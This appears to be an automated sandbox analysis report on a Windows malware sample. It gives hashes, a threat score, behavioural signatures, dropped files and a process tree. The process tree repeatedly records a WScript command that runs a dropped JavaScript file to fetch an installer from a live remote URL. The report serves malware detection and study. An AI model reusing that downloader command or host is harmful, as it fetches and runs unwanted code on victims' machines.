Analysis

  • max time kernel
    38s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    24-08-2024 12:44

General

  • Target

    be9dd77f7eb689192c518f7e8d8df8b9_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    be9dd77f7eb689192c518f7e8d8df8b9

  • SHA1

    12835c1ae1407ae4cf5fd5a85d9950fc5523d5af

  • SHA256

    ab0a6a9e8717e9001d7a9d0890bb8896091e01c74c306e40d3c17b4223ddb8e6

  • SHA512

    97d9221a567f6a6c2ae5abf63188b4347f36725bfed57cc5bf47236f8f6d24b4d428b1facb4966a0a070a779d59b783291383e00a5afb8f01596122bd40bccd7

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3L:/7BSH8zUB+nGESaaRvoB7FJNndni

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be9dd77f7eb689192c518f7e8d8df8b9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\be9dd77f7eb689192c518f7e8d8df8b9_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf47BA.js" http://www.djapp.info/?domain=ZVAtqrEvhN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf47BA.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:2376
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf47BA.js" http://www.djapp.info/?domain=ZVAtqrEvhN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf47BA.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:2292
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf47BA.js" http://www.djapp.info/?domain=ZVAtqrEvhN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf47BA.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:3008
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf47BA.js" http://www.djapp.info/?domain=ZVAtqrEvhN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf47BA.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:1696
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf47BA.js" http://www.djapp.info/?domain=ZVAtqrEvhN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf47BA.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    8717475750c0be8b3f58adde857e9262

    SHA1

    1fa4e313e592b955f5ba112c65d189d284c4d604

    SHA256

    ff4fc5e4635663ce2629b07d8e73c4daf754280757ddb48927428c21572bfe67

    SHA512

    e4872b7f8e2b3fe29066441c559e6a51580c96496833f0dea00a41f5f2b5b27349fb1df2a88fff075de8557963c28bac6080a7fff26226c5d2c6346bececa3f2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    7fa601d6a15670a218928e2ee8e0698b

    SHA1

    5d17703d11bb9dbfed5bd442e47fe695575c37d1

    SHA256

    7ee2477635b9eba29dbf69e96adb37dfb39b52c038ee52372d5470f76e9919df

    SHA512

    d2e5b23dd186330fe71289ade7fb8fd224ee38cf3125f21a926a7b2d2c10b1513d60bfde8d2b9e1fcc32aebf870ce58e941d4bbb3238921d642ec99d3d992c73

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    045532a6cdbe37ad460bfd84b0c62fe3

    SHA1

    8ff6f348c84ac33d0eded3ae4b240e51d5208cf9

    SHA256

    94a57dbff15ba17e8a52d4a140d17289db3d87f93df74498070d8e492a159a04

    SHA512

    2c0c720f02eab32e8d9953bf8be57c973411593286d359e0e85d4abf1dcc58f75a987f4efecb3c933089cdc28f6d3cb865eedf3e3734eebcf11a2a9e154f59b7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\domain_profile[1].htm

    Filesize

    40KB

    MD5

    1c16126f37848d553caf29e64ad75c99

    SHA1

    8f50f56a404e212b21bc59ea8f4d59c3b2f4f142

    SHA256

    c875f4360603d82b3e5c684fa7e923900ffe584a7eddfbc7792abbb494d50502

    SHA512

    e66966108dad41ba6c996d02346d9f55676fb4aba987860d78ab814de10244c6f43f10c828d3987db9826660ad969d0d0d8bc98a5cd713ded94b5dc72d03e268

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\domain_profile[1].htm

    Filesize

    6KB

    MD5

    2ab256967e914bd5fb85ec4124cb575d

    SHA1

    cedc292f05f858757106956ceb3bb324428f14d3

    SHA256

    4ab5ea7e448fea7b4bc7cacfaba287f66340762b2db06f44b852e7f74366cd41

    SHA512

    03d104cfb64ed604448776970e63d65e139deb330363d90566695f7672b74292ef289672610aff053ee14328d502c193d31b6fccbedaafd3a108c4d9768eff71

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q98GZSGI\domain_profile[1].htm

    Filesize

    6KB

    MD5

    634ddde27d7565d8937dcfccea7015fa

    SHA1

    45d743f802196722e23afe0494f791f668c95896

    SHA256

    a3b83770605ef75a85fe3814bb9eac516e637920d83035ca4b32ea471ce6a721

    SHA512

    f9c3af24064bb216ba7e77bc34f380fa10b249bb8f5dd51abaa07698f65c221edf53bbb1923fcfe0611711b9993c279125deb69578ea6b2d15749d97c3b4d3e8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q98GZSGI\domain_profile[1].htm

    Filesize

    40KB

    MD5

    a4adea16627adcb4a4ff7c3505757e55

    SHA1

    cb59ce4cf409747a3ac6aaffbf81af257ad8ba4d

    SHA256

    b8be41a85f285df8515981438ea62453d79a1290bf2cd8553625ac9bef729dda

    SHA512

    fca4ce6c9a8e6819f245775895705b14915f0dbb8c6a18980f06921c640c055d70a3a817f96a6f6066b3baf381c19b72459fe8251e0d436474f237a6f37d68c7

  • C:\Users\Admin\AppData\Local\Temp\Cab7761.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar903F.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\fuf47BA.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PP4TOSZA.txt

    Filesize

    177B

    MD5

    5e1a1eee8d970d7be9a46b6df5b21185

    SHA1

    15a397c551ce59825b47d42adced527a7423cc14

    SHA256

    e0b6f5a176fb1f22e32e651cd3046263cc69199e75379bf3f2df0fad72cadb2c

    SHA512

    12ebcc452939b3833a60a610bbfddf76c1d926c64b2bd7ccef277114a480e0de6316cca48b7e24740fc701ad44424466ab27c8b57ef5ad10f218c8dde915a03a